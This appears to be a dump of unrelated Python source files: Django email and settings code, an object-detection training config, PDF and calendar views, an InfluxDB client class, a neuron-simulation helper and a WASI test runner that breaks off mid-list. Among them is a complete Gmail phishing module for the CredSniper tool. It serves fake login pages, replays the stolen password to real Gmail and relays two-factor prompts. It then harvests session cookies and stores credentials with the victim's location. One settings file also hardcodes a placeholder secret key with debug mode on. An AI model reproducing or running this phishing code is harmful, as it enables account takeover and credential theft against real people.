conf = user.appconfig
bcc = settings.ADDITIONALLY_SEND_TO
subject = subject or conf.CONFIRM_EMAIL_SUBJECT
if settings.IGNORE_USER_EMAIL:
recipients = bcc
bcc = None
else:
recipients = [user.email]
token = default_token_generator.make_token(user)
context = {
'user': user,
'password_reset_confirm_url': user.get_confirm_link(user.urlnames.password_reset_confirm_urlname, token),
'account_confirm_url': user.get_confirm_link(user.urlnames.account_confirm_urlname, token),
'login_url': user._get_domain() + settings.LOGIN_URL
}
context.update(extra_context)
email = HtmlEmail(
from_email=conf.FROM_EMAIL,
to=recipients,
bcc=bcc,
subject=subject,
template=template,
context=context
)
email.send()
|
# model settings
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_r50_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = "very-secret-key"
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"app",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
]
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
"OPTIONS": {
"min_length": 9,
},
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
ROOT_URLCONF = "app.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
],
},
},
]
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
}
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
|
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Post, Profile, Comments
from pyuploadcare.dj.forms import FileWidget
from pyuploadcare.dj.models import ImageField
class SignupForm(UserCreationForm):
email = forms.EmailField(max_length=200, help_text = 'Required')
class Meta:
model = User
fields = ('username', 'email', 'password1', 'password2')
class PostForm(forms.ModelForm):
class Meta:
model = Post
exclude = ['likes', 'post_date', 'profile']
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
exclude = ['user']
class CommentForm(forms.ModelForm):
class Meta:
model = Comments
exclude = ['post', 'user']
|
from .base import *
try:
    from .local import *
except ImportError:
    pass
try:
    from .production import *
except ImportError:
    pass
try:
    from .imac import *
except ImportError:
    pass
try:
    from .macbookpro import *
except ImportError:
    pass
|
import os
import six
import requests
import icalendar
from django.views.generic.base import View, ContextMixin
from django.http import HttpResponse, Http404
from django.core.exceptions import ImproperlyConfigured
from pytz import timezone
from dateutil.parser import parse
# PDFreactor's python wrapper doesn't support python 3, so neither can we for
# now.
if six.PY2:
from core.lib.PDFreactor import *
class PDFGeneratorView(View):
render_url = None
stylesheet_url = None
filename = None
license = os.environ.get('PDFREACTOR_LICENSE')
def get_render_url(self):
if self.render_url is None:
raise ImproperlyConfigured(
"PDFGeneratorView requires either a definition of "
"'render_url' or an implementation of 'get_render_url()'")
return self.render_url
def get_stylesheet_url(self):
if self.stylesheet_url is None:
raise ImproperlyConfigured(
"PDFGeneratorView requires either a definition of "
"'stylesheet_url' or an implementation of 'get_stylesheet_url()'")
return self.stylesheet_url
def get_filename(self):
if self.filename is None:
raise ImproperlyConfigured(
"PDFGeneratorView requires either a definition of "
"'filename' or an implementation of 'get_filename()'")
return self.filename
def generate_pdf(self):
if self.license is None:
raise Exception("PDFGeneratorView requires a license")
pdf_reactor = PDFreactor()
pdf_reactor.setLogLevel(PDFreactor.LOG_LEVEL_WARN)
pdf_reactor.setLicenseKey(self.license)
pdf_reactor.setAuthor('CFPB')
pdf_reactor.setAddTags(True)
pdf_reactor.setAddBookmarks(True)
pdf_reactor.addUserStyleSheet('', '', '', self.get_stylesheet_url())
query_string = self.request.GET.urlencode()
result = \
pdf_reactor.renderDocumentFromURL('{0}?{1}'.format(
self.get_render_url(),
query_string))
# Check if successful
if result is None:
# Not successful, return 500
raise Exception('Error while rendering PDF: {}'.format(
pdf_reactor.getError()))
else:
# Set the correct header for PDF output
response = HttpResponse(result, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename={0}'.format(
self.get_filename())
return response
def get(self, *args, **kwargs):
return self.generate_pdf()
class ICSView(ContextMixin, View):
"""
Returns an .ics file for a given calendar event
"""
    # Constants
    event_calendar_prodid = '-//CFPB//Calendar Item//EN'
event_source = None
# Default variables
event_summary = ''
event_dtstart = '2015-01-01T00:00:00'
event_dtend = '2015-01-01T00:00:00'
event_dtstamp = '2015-01-01T00:00:00'
event_uid = ''
event_priority = 1
event_organizer = ''
event_organizer_addr = ''
event_location = ''
event_status = 'TENTATIVE'
def get_event_source(self):
if self.event_source is None:
raise ImproperlyConfigured(
"ICSView requires an 'event_source' to be set.")
return self.event_source
def get_event_json(self, event_slug):
source_template = self.get_event_source()
source_url = source_template.replace('<event_slug>', event_slug)
source_response = requests.get(source_url)
try:
self.event_json = source_response.json()['ics']
except ValueError:
self.event_json = {}
return source_response.status_code
def get_field_value(self, attribute):
"""
Check if the attribute keyname was passed in; if so, get the value
Otherwise, use the default attribute on this base class
"""
attribute_variable = "{}_keyname".format(attribute)
try:
attribute_value = getattr(self, attribute_variable)
return self.event_json.get(attribute_value, '')
except AttributeError:
attribute_value = getattr(self, attribute)
return attribute_value
def make_date_tz_aware(self, date, tzinfo_field):
"""
Convert datetime-naive date to a datetime-aware date
Specifically setting a location/TZ like this is required by icalendar
"""
        naive_date = parse(date)
        if self.event_json.get(tzinfo_field):
            tzname = self.event_json[tzinfo_field]
            # localize() attaches the zone to the naive datetime; astimezone()
            # would wrongly assume the naive value is in server-local time.
            aware_date = timezone(tzname).localize(naive_date)
        else:
            aware_date = timezone('UTC').localize(naive_date)
return aware_date
def generate_ics(self, event_slug):
# Get the event json from our source
source_status = self.get_event_json(event_slug)
if source_status != 200:
return HttpResponse('', status=source_status)
# Create the Calendar
calendar = icalendar.Calendar()
calendar.add('prodid', self.event_calendar_prodid)
calendar.add('version', '2.0')
calendar.add('method', 'publish')
# Create the event
event = icalendar.Event()
# Populate the event
event.add('summary', self.get_field_value('event_summary'))
event.add('uid', self.get_field_value('event_uid'))
event.add('location', self.get_field_value('event_location'))
dtstart = self.make_date_tz_aware(self.get_field_value('event_dtstart'),
'starting_tzidnfo')
dtend = self.make_date_tz_aware(self.get_field_value('event_dtend'),
'ending_tzidnfo')
event.add('dtstart', dtstart)
event.add('dtend', dtend)
event.add('dtstamp', parse(self.get_field_value('event_dtstamp')))
event.add('status', self.get_field_value('event_status'))
# Create any persons associated with the event
if self.get_field_value('event_organizer_addr') and \
self.get_field_value('event_organizer'):
organizer = icalendar.vCalAddress(
'MAILTO:' + self.get_field_value('event_organizer_addr'))
organizer.params['cn'] = icalendar.vText(
self.get_field_value('event_organizer'))
event.add('organizer', organizer)
# Add the event to the calendar
calendar.add_component(event)
# Return the ICS formatted calendar
response = HttpResponse(calendar.to_ical(),
content_type='text/calendar',
status=source_status,
charset='utf-8')
response['Content-Disposition'] = 'attachment;filename={}.ics'.format(
event_slug)
return response
    def get(self, *args, **kwargs):
        event_slug = kwargs.get('doc_id')
        if not event_slug:
            # Raise (not return) Http404 so Django renders a real 404 response.
            raise Http404
        return self.generate_ics(event_slug)
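# A minimal subclass sketch (hypothetical source URL and key names). The
# '<event_slug>' token is substituted by get_event_json(), and each
# 'event_*_keyname' attribute redirects get_field_value() to a key in the
# source JSON instead of the class-level default:
#
# class PressEventICSView(ICSView):
#     event_source = 'https://example.com/api/events/<event_slug>.json'
#     event_summary_keyname = 'title'
#     event_dtstart_keyname = 'start_dt'
#     event_dtend_keyname = 'end_dt'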
|
# Copyright 2021 Hoplite Industries, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Organization Object
===================
This object is based on the following JSON structure that comes back
from InfluxDB.
.. _json-org-structure:
JSON Response for an Organization.
.. code-block:: json
{
"links": {
"self": "/api/v2/orgs/1",
"members": "/api/v2/orgs/1/members",
"owners": "/api/v2/orgs/1/owners",
"labels": "/api/v2/orgs/1/labels",
"secrets": "/api/v2/orgs/1/secrets",
"buckets": "/api/v2/buckets?org=myorg",
"tasks": "/api/v2/tasks?org=myorg",
"dashboards": "/api/v2/dashboards?org=myorg"
},
"id": "string",
"name": "string",
"description": "string",
"createdAt": "2019-08-24T14:15:22Z",
"updatedAt": "2019-08-24T14:15:22Z",
"status": "active"
}
"""
import json as jsonlib
import re
import typing
# 3rd party
import ciso8601
# Local imports
from .. import types
INVALID = "-invalid-"
class Org: # pylint: disable=R0902,C0103
"""Object describing an InfluxDB Organization.
Parameters:
name (str): *Optional* Name of the Organization.
description (str): *Optional* Long description for the Organization.
org_id (str): *Optional* The org ID for the Organization. This will
be a 16 digit hex string.
"""
def __init__(
self,
name: typing.Optional[str] = None,
description: typing.Optional[str] = None,
org_id: typing.Optional[str] = None,
):
self._name = name if name else INVALID
# Subtle, but empty string "" becomes None
self._description = description if description else None
self._org_id = org_id if org_id else INVALID
self._active = True
self._created_at = 0
self._updated_at = 0
self._links = {}
def _reset(self):
self._name = INVALID
self._description = None
self._org_id = INVALID
self._active = True
self._created_at = 0
self._updated_at = 0
self._links = {}
@property
def name(self) -> str:
"""Name of the organization."""
if self._name == INVALID:
raise ValueError(
"%s.name referenced before being assigned a value."
% (__class__.__name__)
)
return self._name
@name.setter
def name(self, value: str):
if not isinstance(value, str):
raise ValueError(
"%s.name must be a string." % (__class__.__name__)
)
if value == INVALID:
raise ValueError(
"%s.name %s is a restricted value."
% (__class__.__name__, repr(INVALID))
)
if not value:
raise ValueError(
"%s.name must not be empty." % (__class__.__name__)
)
self._name = value
@property
def description(self) -> types.NullStr:
"""Description of the organization."""
return self._description
@description.setter
def description(self, value: types.NullStr):
if value is not None:
if not isinstance(value, str):
raise ValueError("Description must be a string or None.")
self._description = value
@property
def id(self) -> str:
"""Organization ID from InfluxDB."""
if self._org_id == INVALID:
raise ValueError(
"%s.id reference before being assigned a value."
% (__class__.__name__)
)
return self._org_id
@id.setter
def id(self, value: str):
if not isinstance(value, str):
raise ValueError("%s.id must be a string." % (__class__.__name__))
if not types.ID_REGEX.match(value):
raise ValueError(
"%s.id must be a 16 character hex string."
% (__class__.__name__)
)
self._org_id = value
@property
def created(self) -> float:
"""Timestamp of when the org was created.
The value is seconds since Jan 1, 1970 00:00:00 GMT.
Raises:
ValueError: when an invalid value is encountered.
"""
return self._created_at
@created.setter
def created(self, value: types.TimeVal):
if isinstance(value, (int, float)):
self._created_at = float(value)
elif isinstance(value, str):
dt = ciso8601.parse_datetime(value)
self._created_at = dt.timestamp()
else:
raise ValueError(
"Invalid type for a timestamp: %s" % (type(value))
)
@property
def updated(self) -> float:
"""Timestamp of when the org was last updated.
The value is seconds since Jan 1, 1970 00:00:00 GMT.
Raises:
ValueError: when an invalid value is encountered.
"""
return self._updated_at
@updated.setter
def updated(self, value: types.TimeVal):
if isinstance(value, (int, float)):
self._updated_at = float(value)
elif isinstance(value, str):
dt = ciso8601.parse_datetime(value)
self._updated_at = dt.timestamp()
else:
raise ValueError(
"Invalid type for a timestamp: %s" % (type(value))
)
@property
def active(self) -> bool:
"""Whether or not the organization is active."""
return self._active
@active.setter
def active(self, value: bool):
if not isinstance(value, bool):
raise ValueError(
"%s.active must be a bool value." % (__class__.__name__)
)
self._active = value
@property
def links(self) -> dict:
"""Links associated with this org."""
return self._links
@links.setter
def links(self, value):
if not isinstance(value, dict):
raise ValueError(
"%s.links Must be a dictionary not [%s]"
% (__class__.__name__, type(value))
)
# Duplicate the links to prevent odd corruption
self._links = {str(x): str(value[x]) for x in value}
def from_dict(self, data: dict):
"""Fill object from a dictionary object.
Parameters:
data: Dictionary containing an org response from InfluxDB.
See the :ref:`JSON Org Structure <json-org-structure>` for
details on what the dictionary should look like.
"""
try:
self.id = data["id"]
self.name = data["name"]
self.description = data["description"]
self.created = data["createdAt"]
self.updated = data["updatedAt"]
status = data.get("status", "active")
self.active = status == "active"
self.links = data["links"]
except ValueError as err:
self._reset()
raise ValueError(
"%s.from_dict() Invalid dictionary, missing key [%s]"
% (__class__.__name__, err)
) from None
def from_json(self, data: typing.Union[str, bytes]):
"""Fill object from a json string.
Parameters:
data: Dictionary containing an org response from InfluxDB.
See the :ref:`JSON Org Structure <json-org-structure>` for
details on what the JSON should look like.
"""
try:
dictdata = jsonlib.loads(data)
except jsonlib.JSONDecodeError as err:
raise ValueError(
"%s.from_json() Invalid json data: %s"
% (__class__.__name__, err)
) from None
try:
self.from_dict(dictdata)
except ValueError as err:
raise ValueError(
"%s.from_json() Invalid json data: %s"
% (__class__.__name__, err)
) from None
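# A minimal round-trip sketch (illustrative payload only; any 16-character
# hex string satisfies the ID check documented above):
if __name__ == "__main__":  # pragma: no cover
    org = Org()
    org.from_dict({
        "id": "0123456789abcdef",
        "name": "myorg",
        "description": "Example organization",
        "createdAt": "2019-08-24T14:15:22Z",
        "updatedAt": "2019-08-24T14:15:22Z",
        "status": "active",
        "links": {"self": "/api/v2/orgs/0123456789abcdef"},
    })
    print(org.name, org.active, org.created)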
|
from collections import defaultdict
from neuronpp.core.decorators import distparams
from neuronpp.core.cells.netcon_cell import NetConCell
from neuronpp.core.hocwrappers.synapses.single_synapse import SingleSynapse
class SynapticCell(NetConCell):
def __init__(self, name=None, compile_paths=None):
NetConCell.__init__(self, name, compile_paths=compile_paths)
self.syns = []
self._syn_num = defaultdict(int)
def filter_synapses(self, mod_name: str = None, obj_filter=None, name=None, source=None,
point_process=None, parent=None, tag=None, **kwargs):
"""
Currently all filter passed are treated as AND statements.
* Whole object callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which name contains 'apic' or
their distance > 1000 um from the soma:
```
soma = cell.filter_secs("soma")
cell.filter_secs(obj_filter=lambda o: 'apic' in o.name or
h.distance(soma.hoc(0.5), o.hoc(0.5)) > 1000)
```
* Single object field filter based on callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which parent's name contains less than 10
characters
```
cell.filter_secs(parent=lambda o: len(o.parent.name) < 10)
```
:param mod_name:
single string defining name of point process type name, eg. concere synaptic mechanisms
like Syn4PAChDa
:param obj_filter:
Whole object callable functional filter. If you added also any kwargs they will be
together with the
obj_filter treated as AND statement.
:param name:
start with 'regex:any pattern' to use regular expression. If without 'regex:' -
will look which Hoc objects contain the str
:param source:
string of source compound name (if source is provided)
:param point_process:
string of point process compound name
:return:
"""
return self.filter(self.syns, obj_filter=obj_filter, mod_name=mod_name, name=name,
source=source, point_process=point_process, parent=parent,
tag=tag, **kwargs)
def remove_synapses(self, mod_name: str = None, obj_filter=None, name=None, source=None,
point_process=None, parent=None, tag=None, **kwargs):
"""
Currently all filter passed are treated as AND statements.
* Whole object callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which name contains 'apic' or
their distance > 1000 um from the soma:
```
soma = cell.filter_secs("soma")
cell.filter_secs(obj_filter=lambda o: 'apic' in o.name or
h.distance(soma.hoc(0.5), o.hoc(0.5)) > 1000)
```
* Single object field filter based on callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which parent's name contains less than 10
characters
```
cell.filter_secs(parent=lambda o: len(o.parent.name) < 10)
```
:param mod_name:
single string defining name of point process type name, eg. concere synaptic mechanisms
like Syn4PAChDa
:param obj_filter:
Whole object callable functional filter. If you added also any kwargs they will be
together with the
obj_filter treated as AND statement.
:param name:
start with 'regex:any pattern' to use regular expression. If without 'regex:' -
will look which Hoc objects contain the str
:param source:
string of source compound name (if source is provided)
:param point_process:
string of point process compound name
:return:
"""
return self.remove(self.syns, obj_filter=obj_filter, mod_name=mod_name, name=name,
source=source, point_process=point_process, parent=parent,
tag=tag, **kwargs)
@distparams
def add_synapse(self, source, mod_name: str, seg, netcon_weight=1, delay=1, threshold=10,
tag: str = None, **synaptic_params):
"""
:param source:
Can be only: hocwrappers.NetStim, hocwrappers.VecStim, Seg or None.
If None it will create NetConn with no source, which can be use as external event source
:param netcon_weight:
:param tag:
:param mod_name:
:param seg:
:param source_loc:
:param target_loc:
:param delay:
:param threshold:
:param synaptic_params:
:return:
"""
pp = self.add_point_process(mod_name=mod_name, seg=seg, tag=tag, **synaptic_params)
nn = self.add_netcon(source=source, netcon_weight=netcon_weight, point_process=pp,
delay=delay, threshold=threshold)
syn_name = "%s[%s]" % (pp.name, self._syn_num[mod_name])
syn = SingleSynapse(source, point_process=pp, netcon=nn, name=syn_name, tag=tag)
self.syns.append(syn)
self._syn_num[mod_name] += 1
return syn
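# A minimal usage sketch (hypothetical section and mechanism names; assumes a
# concrete cell subclass whose sections are already built, and NEURON's
# built-in ExpSyn point process):
#
# cell = SynapticCell(name="cell")
# seg = cell.filter_secs("soma")(0.5)
# syn = cell.add_synapse(source=None, mod_name="ExpSyn", seg=seg,
#                        netcon_weight=0.01, delay=1, threshold=10)
# matching = cell.filter_synapses(mod_name="ExpSyn")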
|
from __future__ import print_function
from flask import redirect, request, jsonify, Markup
from os import system
from core import functions
from core.base_module import *
import uuid
import mechanicalsoup
import bs4
import re, sys, time, random
import json
class GmailModule(BaseModule):
def __init__(self, enable_2fa=False):
super().__init__(self)
self.set_name('gmail')
self.add_route('main', '/')
self.add_route('accounts', '/accounts')
self.add_route('authenticate', '/authenticate')
self.add_route('redirect', '/redirect')
self.enable_two_factor(enable_2fa)
def main(self):
next_url = '/accounts'
template = self.env.get_template('login.html')
return template.render(
next_url=next_url,
hostname=request.host,
)
def accounts(self):
self.user = request.values.get('email')
next_url = '/authenticate'
template = self.env.get_template('password.html')
return template.render(
hostname=request.host,
next_url=next_url,
email=self.user
)
def authenticate(self):
self.user = request.values.get('email')
self.password = request.values.get('password')
functions.cache_creds(self.name, self.user, self.password)
triggered = self.trigger()
redirect_user = triggered.get('action', None)
if redirect_user == 'redirect':
return redirect(self.final_url, code=302)
if not self.enable_2fa:
return redirect(self.final_url, code=302)
twofactor_type = triggered.get('type', 'error')
twofactor_code = triggered.get('code', None)
twofactor_name = triggered.get('name', None)
if twofactor_type == 'touchscreen':
if twofactor_code:
additional = Markup(
', then touch number <strong>{}</strong>.'.format(
twofactor_code
)
)
twofactor_code = additional
else:
twofactor_code = '.'
tf_type = '{}.html'.format(twofactor_type)
template = self.env.get_template(tf_type)
next_url = '/redirect'
return template.render(
hostname=request.host,
next_url=next_url,
enable_2fa=self.enable_2fa,
email=self.user,
password=self.password,
code=twofactor_code,
name=twofactor_name,
two_factor_type=twofactor_type,
first_name=''
)
def redirect(self):
self.user = request.values.get('email')
self.password = request.values.get('password')
self.two_factor_token = request.values.get('two_factor_token')
self.two_factor_type = request.values.get('two_factor_type')
city, region, zip_code = '','',''
try:
geoip_url = 'https://freegeoip.net/json/{}'.format(
request.remote_addr
)
geo_browser = mechanicalsoup.StatefulBrowser()
geo_response = geo_browser.open(geoip_url)
geo = json.loads(geo_response.text)
city = geo['city']
region = geo['region_name']
zip_code = geo['zip_code']
except Exception as ex:
pass
functions.store_creds(
self.name,
self.user,
self.password,
self.two_factor_token,
self.two_factor_type,
request.remote_addr,
city,
region,
zip_code
)
return redirect(self.final_url, code=302)
def trigger(self):
raw_headers = None
data_2fa = {
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
}
try:
browser = mechanicalsoup.StatefulBrowser(
soup_config={'features': 'html'},
raise_on_404=True,
user_agent='Python-urllib/2.7',
)
page = browser.open('https://www.gmail.com')
user_form = browser.select_form('form')
user_form.set('Email', self.user)
user_response = browser.submit(user_form, page.url)
pass_form = mechanicalsoup.Form(user_response.soup.form)
pass_form.set('Passwd', self.password)
pass_response = browser.submit(pass_form, page.url)
raw_headers = pass_response.headers
soup = pass_response.soup
raw = soup.text
sms = soup.find('input', {'id': 'idvPreregisteredPhonePin'})
sms_old = soup.find('button', {'id': 'idvPreresteredPhoneSms'})
u2f = soup.find('input', {'id': 'id-challenge'})
touch = soup.find('input', {'id': 'authzenToken'})
authenticator = soup.find('input', {'id': 'totpPin'})
backup = soup.find('input', {'id': 'backupCodePin'})
if sms or sms_old:
data_2fa['type'] = 'sms'
if sms_old:
final_form = mechanicalsoup.Form(pass_response.soup.form)
final_response = browser.submit(final_form, page.url)
raw_headers = final_response.headers
raw = final_response.soup.text
data_2fa['type'] = 'u2f'
code = ''
regexes = [
r"\d{2}(?=</b>)",
r"(?<=\u2022)\d{2}(?=G)",
r"\d{2}(?=G)",
r"\d{2}(?=\</b>)",
r"\d{2}(?=S)",
]
for regex in regexes:
matches = re.search(regex, raw, re.UNICODE)
if matches:
code = matches.group()
break
else:
code = '••'
data_2fa['code'] = code
elif u2f:
data_2fa['type'] = 'u2f'
elif touch:
code = ''
name = ''
regex_codes = [
r"(?<=<b>)\d{1,3}(?=</b>)",
r"(?<=then tap )\d{1,3}(?= on your phone)"
]
for regex_code in regex_codes:
code_match = re.search(regex_code, raw)
if code_match:
code = code_match.group()
else:
code = 0
regex_names = [
r"(?<=Unlock your ).*(?=Tap)",
r"(?<=Check your ).*(?=<\/h2>)",
]
for regex_name in regex_names:
name_match = re.search(regex_name, raw)
if name_match:
name = name_match.group()
else:
name = 'phone'
data_2fa['code'] = code
data_2fa['name'] = name
data_2fa['type'] = 'touchscreen'
elif authenticator:
name = ''
regexes = [
r"(?<=Get a verification code from the <strong>).*(?=<\/strong>)",
r"(?<=Get a verification code from the ).*(?= app)",
]
for regex in regexes:
name_match = re.search(regex, raw, re.UNICODE)
if name_match:
name = name_match.group()
else:
name = 'authenticator app'
data_2fa['name'] = name
data_2fa['type'] = 'authenticator'
elif backup:
data_2fa['type'] = 'backup'
else:
if 'Try again in a few hours' in raw:
data_2fa['error'] ='locked out'
data_2fa['action'] = 'redirect'
cookies = []
for c in browser.get_cookiejar():
cookie = {}
cookie['name'] = c.name
cookie['value'] = c.value
cookie['domain'] = c.domain
cookie['path'] = c.path
cookie['secure'] = c.secure
cookie['expires'] = c.expires
cookies.append(cookie)
data_2fa['cookies'] = cookies
for h in raw_headers:
header = {}
header['name'] = h
header['value'] = raw_headers[h]
data_2fa['headers'].append(header)
except Exception as ex:
data_2fa['error'] = ex
pass
return data_2fa
# REQUIRED: When module is loaded, credsniper calls load()
def load(enable_2fa=False):
'''Initial load() function called from importlib in the main CredSniper functionality.'''
return GmailModule(enable_2fa)
|
#!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-wasi-test.py
# ./run-wasi-test.py --exec ../custom_build/wasm3 --timeout 120
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:." --separate-args
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:. wasm3.wasm --" --fast
import argparse
import sys
import subprocess
import hashlib
import fnmatch
sys.path.append('../extra')
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3")
parser.add_argument("--separate-args", action='store_true') # use "--" separator for wasmer, wasmtime
parser.add_argument("--timeout", type=int, default=120)
parser.add_argument("--fast", action='store_true')
args = parser.parse_args()
stats = dotdict(total_run=0, failed=0, crashed=0, timeout=0)
commands_full = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "/wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; /wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "Simple WASI test (wasm-opt -O3)",
"wasm": "./wasi/simple/test-opt.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["128", "4e5"],
"expect_sha1": "37091e7ce96adeea88f079ad95d239a651308a56"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["128", "4e5"],
"expect_sha1": "b3f904daf1c972b4f7d3f8996743cb5b5146b877"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "128x128"],
"expect_sha1": "90f86845ae227466a06ea8db06e753af4838f2fa"
}, {
